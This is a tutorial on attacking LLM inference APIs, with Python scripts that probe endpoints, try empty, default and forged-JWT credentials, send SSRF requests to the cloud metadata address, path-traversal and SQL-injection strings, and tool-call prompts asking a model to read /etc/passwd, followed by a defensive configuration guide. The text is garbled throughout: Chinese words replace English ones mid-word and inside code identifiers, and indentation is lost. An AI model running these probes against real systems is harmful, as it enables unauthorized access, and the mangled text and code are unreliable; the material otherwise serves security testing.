Inference Endpoint 利用ation
Advanced12 min readUpdated 2026-03-15
利用ing inference API endpoints for unauthorized access, data exfiltration, and service abuse through authentication flaws, input validation gaps, and misconfigured permissions.
LLM 推論 endpoints expose model capabilities through APIs, typically REST or gRPC. These endpoints handle sensitive operations: they process user inputs, execute model 推論, and may have access to internal tools, databases, or other services. Misconfigurations in 認證, 授權, 輸入 validation, and error handling can expose the underlying infrastructure to 利用. This walkthrough covers systematic 測試 of 推論 endpoints for 安全 weaknesses.
Step 1: Endpoint Discovery and Mapping
Before exploiting an endpoint, map its full API surface.
"""
Discover and map 推論 API endpoints.
"""
import requests
from dataclasses import dataclass, field
from typing import Optional
@dataclass
class EndpointInfo:
url: str
method: str
auth_required: bool
parameters: list[str]
response_format: str
notes: str = ""
@dataclass
class APIMap:
base_url: str
endpoints: list[EndpointInfo] = field(default_factory=list)
auth_schemes: list[str] = field(default_factory=list)
version: Optional[str] = None
def discover_endpoints(base_url: str, headers: dict = None) -> APIMap:
"""Probe common 推論 API endpoint patterns."""
api_map = APIMap(base_url=base_url)
headers = headers or {}
# Common 推論 endpoint paths
COMMON_PATHS = [
("/v1/chat/completions", "POST", "OpenAI-compatible chat"),
("/v1/completions", "POST", "OpenAI-compatible completion"),
("/v1/嵌入向量", "POST", "嵌入向量 generation"),
("/v1/models", "GET", "Model listing"),
("/v1/models/{model_id}", "GET", "Model details"),
("/api/generate", "POST", "Ollama-style generation"),
("/api/chat", "POST", "Ollama-style chat"),
("/api/tags", "GET", "Ollama model listing"),
("/predict", "POST", "Generic prediction endpoint"),
("/推論", "POST", "Generic 推論 endpoint"),
("/health", "GET", "Health check"),
("/metrics", "GET", "Prometheus metrics (may leak info)"),
("/docs", "GET", "API documentation (Swagger/OpenAPI)"),
("/openapi.json", "GET", "OpenAPI specification"),
("/redoc", "GET", "ReDoc documentation"),
]
for path, method, description in COMMON_PATHS:
url = f"{base_url.rstrip('/')}{path}"
try:
if method == "GET":
resp = requests.get(url, headers=headers, timeout=5)
else:
resp = requests.post(url, headers=headers, json={}, timeout=5)
if resp.status_code != 404:
auth_required = resp.status_code in (401, 403)
api_map.endpoints.append(EndpointInfo(
url=path,
method=method,
auth_required=auth_required,
parameters=[],
response_format=resp.headers.get("content-type", "unknown"),
notes=f"{description} [{resp.status_code}]",
))
print(f" Found: {method} {path} [{resp.status_code}]")
except requests.exceptions.RequestException:
pass
return api_map
print("Endpoint discovery ready")
print("Call discover_endpoints() with a base URL")Step 2: Authentication 測試
"""
測試 推論 endpoint 認證 for common weaknesses.
"""
import requests
import jwt
import time
from dataclasses import dataclass
@dataclass
class AuthTestResult:
test_name: str
passed: bool
漏洞: str
details: str
def test_authentication(base_url: str, valid_key: str = "") -> list[AuthTestResult]:
"""測試 認證 mechanisms for weaknesses."""
results = []
endpoint = f"{base_url}/v1/chat/completions"
test_body = {
"model": "測試",
"messages": [{"role": "user", "content": "測試"}],
}
# 測試 1: No 認證
try:
resp = requests.post(endpoint, json=test_body, timeout=10)
no_auth = resp.status_code != 401
results.append(AuthTestResult(
test_name="no_auth_required",
passed=not no_auth,
漏洞="Endpoint accessible without 認證" if no_auth else "N/A",
details=f"Status: {resp.status_code}",
))
except Exception as e:
results.append(AuthTestResult("no_auth_required", True, "N/A", str(e)))
# 測試 2: Empty API key
try:
resp = requests.post(
endpoint,
json=test_body,
headers={"Authorization": "Bearer "},
timeout=10,
)
empty_key = resp.status_code not in (401, 403)
results.append(AuthTestResult(
test_name="empty_api_key",
passed=not empty_key,
漏洞="Empty API key accepted" if empty_key else "N/A",
details=f"Status: {resp.status_code}",
))
except Exception as e:
results.append(AuthTestResult("empty_api_key", True, "N/A", str(e)))
# 測試 3: Common default keys
DEFAULT_KEYS = [
"sk-測試", "測試", "default", "admin", "api-key",
"sk-000000000000000000000000",
"EMPTY", "null", "undefined",
]
for key in DEFAULT_KEYS:
try:
resp = requests.post(
endpoint,
json=test_body,
headers={"Authorization": f"Bearer {key}"},
timeout=5,
)
if resp.status_code not in (401, 403):
results.append(AuthTestResult(
test_name=f"default_key_{key}",
passed=False,
漏洞=f"Default/測試 key accepted: {key}",
details=f"Status: {resp.status_code}",
))
except Exception:
pass
# 測試 4: JWT without verification
try:
fake_jwt = jwt.encode(
{"sub": "admin", "exp": int(time.time()) + 3600},
"fake_secret",
algorithm="HS256",
)
resp = requests.post(
endpoint,
json=test_body,
headers={"Authorization": f"Bearer {fake_jwt}"},
timeout=10,
)
jwt_bypass = resp.status_code not in (401, 403)
results.append(AuthTestResult(
test_name="fake_jwt_token",
passed=not jwt_bypass,
漏洞="Forged JWT 符元 accepted" if jwt_bypass else "N/A",
details=f"Status: {resp.status_code}",
))
except Exception as e:
results.append(AuthTestResult("fake_jwt_token", True, "N/A", str(e)))
return results
print("Authentication 測試 ready")Step 3: 輸入 Validation 攻擊
"""
測試 輸入 validation on 推論 endpoints for injection
and abuse 漏洞.
"""
import requests
import json
from dataclasses import dataclass
from typing import Optional
@dataclass
class InputValidationResult:
test_name: str
payload: str
status_code: int
vulnerability_detected: bool
details: str
def test_input_validation(
endpoint: str,
headers: dict,
) -> list[InputValidationResult]:
"""測試 輸入 validation with various malformed and malicious inputs."""
results = []
# 測試 1: Oversized 輸入
huge_input = "A" * 1_000_000
try:
resp = requests.post(endpoint, headers=headers, json={
"model": "測試",
"messages": [{"role": "user", "content": huge_input}],
}, timeout=30)
results.append(InputValidationResult(
test_name="oversized_input",
payload=f"1MB string ({len(huge_input)} chars)",
status_code=resp.status_code,
vulnerability_detected=resp.status_code == 200,
details="No 輸入 size limit" if resp.status_code == 200 else "Properly rejected",
))
except Exception as e:
results.append(InputValidationResult(
"oversized_input", "1MB string", 0, False, str(e),
))
# 測試 2: Nested JSON (potential stack overflow)
nested = {"role": "user", "content": "測試"}
for _ in range(100):
nested = {"nested": nested}
try:
resp = requests.post(endpoint, headers=headers,
data=json.dumps({"model": "測試", "extra": nested}),
timeout=10)
results.append(InputValidationResult(
test_name="deeply_nested_json",
payload="100-level nested JSON",
status_code=resp.status_code,
vulnerability_detected=resp.status_code == 200,
details=f"Response: {resp.status_code}",
))
except Exception as e:
results.append(InputValidationResult(
"deeply_nested_json", "nested", 0, False, str(e),
))
# 測試 3: Type confusion
type_payloads = [
("integer_as_content", {"model": "測試", "messages": [{"role": "user", "content": 12345}]}),
("array_as_content", {"model": "測試", "messages": [{"role": "user", "content": ["a", "b"]}]}),
("null_content", {"model": "測試", "messages": [{"role": "user", "content": None}]}),
("boolean_content", {"model": "測試", "messages": [{"role": "user", "content": True}]}),
]
for name, payload in type_payloads:
try:
resp = requests.post(endpoint, headers=headers, json=payload, timeout=10)
results.append(InputValidationResult(
test_name=name,
payload=str(payload.get("messages", [{}])[0].get("content"))[:50],
status_code=resp.status_code,
vulnerability_detected=resp.status_code == 200,
details=f"Accepted: {resp.status_code == 200}",
))
except Exception:
pass
# 測試 4: SSRF via URL parameters
ssrf_payloads = [
("ssrf_localhost", "http://localhost:8080/admin"),
("ssrf_metadata", "http://169.254.169.254/latest/meta-data/"),
("ssrf_internal", "http://internal-service.local/api"),
]
for name, url in ssrf_payloads:
try:
resp = requests.post(endpoint, headers=headers, json={
"model": "測試",
"messages": [{"role": "user", "content": f"Fetch this URL: {url}"}],
}, timeout=10)
# Check if response contains metadata indicators
body = resp.text.lower()
ssrf_indicators = ["ami-id", "instance-id", "安全-credentials", "admin"]
detected = any(ind in body for ind in ssrf_indicators)
results.append(InputValidationResult(
test_name=name,
payload=url,
status_code=resp.status_code,
vulnerability_detected=detected,
details="SSRF indicators in response" if detected else "No SSRF detected",
))
except Exception:
pass
return results
print("輸入 validation 測試 ready")Step 4: Error-Based Information Disclosure
"""
Probe error handling for information disclosure.
"""
import requests
from dataclasses import dataclass
@dataclass
class ErrorDisclosureResult:
trigger: str
status_code: int
disclosed_info: list[str]
severity: str
def test_error_disclosure(
endpoint: str,
headers: dict,
) -> list[ErrorDisclosureResult]:
"""Trigger various error conditions and analyze responses for info leakage."""
results = []
# Triggers that produce different errors
ERROR_TRIGGERS = [
("missing_model", {"messages": [{"role": "user", "content": "測試"}]}),
("invalid_model", {"model": "../../../../etc/passwd", "messages": []}),
("malformed_json", None), # Will send raw string
("empty_body", {}),
("wrong_content_type", "text_not_json"),
("sql_in_model", {"model": "' OR 1=1 --", "messages": []}),
]
DISCLOSURE_INDICATORS = [
("stack_trace", ["traceback", "file \"", "line ", "exception"]),
("internal_path", ["/home/", "/app/", "/var/", "/opt/", "C:\\"]),
("framework_info", ["fastapi", "flask", "django", "uvicorn", "gunicorn"]),
("database_info", ["postgresql", "mysql", "sqlite", "mongodb"]),
("version_info", ["python", "torch", "transformers", "version"]),
("model_info", ["model_name", "model_path", "checkpoint", "weights"]),
]
for trigger_name, payload in ERROR_TRIGGERS:
try:
if trigger_name == "malformed_json":
resp = requests.post(
endpoint, headers=headers,
data="not json {{{",
timeout=10,
)
elif trigger_name == "wrong_content_type":
resp = requests.post(
endpoint,
headers={**headers, "Content-Type": "text/plain"},
data="測試",
timeout=10,
)
else:
resp = requests.post(
endpoint, headers=headers, json=payload, timeout=10,
)
body = resp.text.lower()
disclosed = []
for info_type, indicators in DISCLOSURE_INDICATORS:
if any(ind in body for ind in indicators):
disclosed.append(info_type)
severity = "high" if len(disclosed) > 2 else "medium" if disclosed else "low"
results.append(ErrorDisclosureResult(
trigger=trigger_name,
status_code=resp.status_code,
disclosed_info=disclosed,
severity=severity,
))
if disclosed:
print(f" {trigger_name}: DISCLOSURE - {', '.join(disclosed)}")
else:
print(f" {trigger_name}: Clean error response [{resp.status_code}]")
except Exception as e:
print(f" {trigger_name}: Error - {e}")
return results
print("Error disclosure 測試 ready")Step 5: Authorization and Access Control 測試
"""
測試 授權 boundaries on 推論 endpoints.
"""
import requests
from dataclasses import dataclass
@dataclass
class AuthzTestResult:
test_name: str
expected_access: bool
actual_access: bool
漏洞: str
def test_authorization(
base_url: str,
regular_key: str,
admin_key: str = "",
) -> list[AuthzTestResult]:
"""測試 授權 controls for privilege escalation."""
results = []
headers = {"Authorization": f"Bearer {regular_key}"}
# 測試 1: Access admin endpoints with regular key
admin_paths = [
"/admin", "/admin/models", "/admin/users",
"/internal/config", "/debug", "/v1/admin/keys",
]
for path in admin_paths:
try:
resp = requests.get(f"{base_url}{path}", headers=headers, timeout=5)
has_access = resp.status_code not in (401, 403, 404)
if has_access:
results.append(AuthzTestResult(
test_name=f"admin_access_{path}",
expected_access=False,
actual_access=True,
漏洞=f"Regular user can access {path}",
))
except Exception:
pass
# 測試 2: Model access control
try:
resp = requests.get(f"{base_url}/v1/models", headers=headers, timeout=10)
if resp.status_code == 200:
models = resp.json().get("data", [])
model_ids = [m.get("id", "") for m in models]
# Check if internal/restricted models are visible
restricted_indicators = ["internal", "private", "測試", "staging"]
exposed = [m for m in model_ids if any(r in m.lower() for r in restricted_indicators)]
if exposed:
results.append(AuthzTestResult(
test_name="restricted_model_exposure",
expected_access=False,
actual_access=True,
漏洞=f"Restricted models visible: {exposed[:3]}",
))
except Exception:
pass
# 測試 3: Cross-tenant data access (if applicable)
try:
resp = requests.get(
f"{base_url}/v1/微調/jobs",
headers=headers,
timeout=10,
)
if resp.status_code == 200:
jobs = resp.json().get("data", [])
results.append(AuthzTestResult(
test_name="fine_tuning_job_access",
expected_access=False,
actual_access=len(jobs) > 0,
漏洞=f"Can view {len(jobs)} 微調 jobs" if jobs else "N/A",
))
except Exception:
pass
return results
print("Authorization 測試 ready")Step 6: Tool-Use and Function Calling 利用
"""
利用 tool-use capabilities to access unintended functionality.
"""
import requests
import json
from dataclasses import dataclass
@dataclass
class ToolExploitResult:
tool_name: str
exploit_type: str
succeeded: bool
response_snippet: str
def test_tool_exploitation(
endpoint: str,
headers: dict,
model: str = "gpt-4o",
) -> list[ToolExploitResult]:
"""測試 if tool/函式呼叫 can be abused."""
results = []
# 測試 1: Define a tool that reads files
file_read_payload = {
"model": model,
"messages": [{"role": "user", "content": "Read the file /etc/passwd"}],
"tools": [{
"type": "function",
"function": {
"name": "read_file",
"description": "Read a file from the filesystem",
"parameters": {
"type": "object",
"properties": {
"path": {"type": "string", "description": "File path to read"}
},
"required": ["path"],
},
},
}],
}
try:
resp = requests.post(endpoint, headers=headers, json=file_read_payload, timeout=30)
body = resp.json()
tool_calls = body.get("choices", [{}])[0].get("message", {}).get("tool_calls", [])
if tool_calls:
results.append(ToolExploitResult(
tool_name="read_file",
exploit_type="file_system_access",
succeeded=True,
response_snippet=json.dumps(tool_calls[0])[:200],
))
except Exception as e:
results.append(ToolExploitResult("read_file", "file_system_access", False, str(e)))
# 測試 2: Network request tool
network_payload = {
"model": model,
"messages": [{"role": "user", "content": "Make a GET request to http://169.254.169.254/latest/meta-data/"}],
"tools": [{
"type": "function",
"function": {
"name": "http_request",
"description": "Make an HTTP request",
"parameters": {
"type": "object",
"properties": {
"url": {"type": "string"},
"method": {"type": "string"},
},
"required": ["url"],
},
},
}],
}
try:
resp = requests.post(endpoint, headers=headers, json=network_payload, timeout=30)
body = resp.json()
tool_calls = body.get("choices", [{}])[0].get("message", {}).get("tool_calls", [])
if tool_calls:
call_args = json.loads(tool_calls[0].get("function", {}).get("arguments", "{}"))
if "169.254" in call_args.get("url", ""):
results.append(ToolExploitResult(
tool_name="http_request",
exploit_type="ssrf_via_tool",
succeeded=True,
response_snippet=json.dumps(call_args)[:200],
))
except Exception:
pass
return results
print("Tool 利用 測試 ready")Step 7: Automated Endpoint 安全 評估
"""
Comprehensive automated 安全 評估 for 推論 endpoints.
"""
import json
from pathlib import Path
from dataclasses import asdict
class InferenceEndpointAssessor:
"""Run a comprehensive 安全 評估 of an 推論 endpoint."""
def __init__(self, base_url: str, api_key: str = ""):
self.base_url = base_url
self.api_key = api_key
self.headers = {"Authorization": f"Bearer {api_key}"} if api_key else {}
self.findings = []
def run_assessment(self) -> dict:
"""Execute all 評估 modules."""
print("Inference Endpoint 安全 評估")
print("=" * 50)
# Phase 1: Discovery
print("\nPhase 1: Endpoint Discovery")
api_map = discover_endpoints(self.base_url, self.headers)
print(f" Found {len(api_map.endpoints)} endpoints")
# Phase 2: Authentication
print("\nPhase 2: Authentication 測試")
auth_results = test_authentication(self.base_url, self.api_key)
auth_vulns = [r for r in auth_results if not r.passed]
print(f" Found {len(auth_vulns)} 認證 issues")
# Phase 3: Error handling
print("\nPhase 3: Error Disclosure 測試")
chat_endpoint = f"{self.base_url}/v1/chat/completions"
error_results = test_error_disclosure(chat_endpoint, self.headers)
disclosures = [r for r in error_results if r.disclosed_info]
print(f" Found {len(disclosures)} information disclosure issues")
# Compile report
report = {
"target": self.base_url,
"endpoints_found": len(api_map.endpoints),
"authentication_issues": len(auth_vulns),
"information_disclosures": len(disclosures),
"overall_risk": self._calculate_risk(auth_vulns, disclosures),
}
return report
def _calculate_risk(self, auth_vulns, disclosures) -> str:
if auth_vulns:
return "critical"
if disclosures:
return "high"
return "medium"
print("Endpoint 評估 framework ready")Step 8: Defensive Configuration Guide
"""
Secure 推論 endpoint configuration reference.
"""
SECURE_CONFIG = {
"認證": {
"require_api_key": True,
"key_rotation_days": 90,
"key_length_minimum": 32,
"rate_limit_per_key": True,
"jwt_validation": "RS256 with key rotation",
},
"input_validation": {
"max_input_tokens": 4096,
"max_request_size_bytes": 1_048_576,
"content_type_enforcement": True,
"json_depth_limit": 10,
"reject_unknown_fields": True,
},
"error_handling": {
"generic_error_messages": True,
"no_stack_traces": True,
"no_internal_paths": True,
"structured_error_format": True,
},
"network_security": {
"tls_minimum": "1.2",
"ssrf_protection": True,
"internal_endpoint_isolation": True,
"cors_restricted": True,
},
"監控": {
"log_all_requests": True,
"anomaly_detection": True,
"alert_on_auth_failures": True,
"rate_limit_monitoring": True,
},
}
print("Secure Inference Endpoint Configuration")
print("=" * 50)
for category, settings in SECURE_CONFIG.items():
print(f"\n{category.upper()}:")
for key, value in settings.items():
print(f" {key}: {value}")相關主題
- API Rate Limit Bypass -- Rate limiting 測試
- API Enumeration for LLMs -- Endpoint discovery
- Model Fingerprinting Techniques -- Identifying backend models
Knowledge Check
Why are tool-use capabilities in LLM APIs a significant 安全 concern for 推論 endpoints?